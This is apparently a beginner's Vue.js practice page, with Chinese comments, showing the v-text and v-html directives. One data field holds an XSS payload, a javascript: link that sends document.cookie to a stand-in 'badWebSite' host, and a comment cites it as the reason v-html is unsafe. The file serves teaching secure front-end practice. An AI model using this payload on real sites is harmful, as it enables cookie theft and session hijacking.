<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Title</title>
    <script src="../vueJS/VUE.js"></script>
</head>

<body>
    <div id="root">
        <h1 v-text="name"></h1>
        <div v-html="source"></div>
        <!-- v-text 会替换掉后面的所有内容，而且只会当成文本 -->
    </div> 
    <script type="text/javascript">
    Vue.config.productionTip = false
    new Vue({
        el:'#root',
        data:{
            name:'lzt',
            source:'<h3>你好</h3>',
            safetyPro:'<a href=javascript:location.href="http://www.badWebSite?"+document.cookie></a>'
        }
    })
    //v-html可以解析html,但是有安全性问题（盗走cookie）,例如上面的例子会把别人的cookie发送到不良服务器
    </script>
</body>
</html>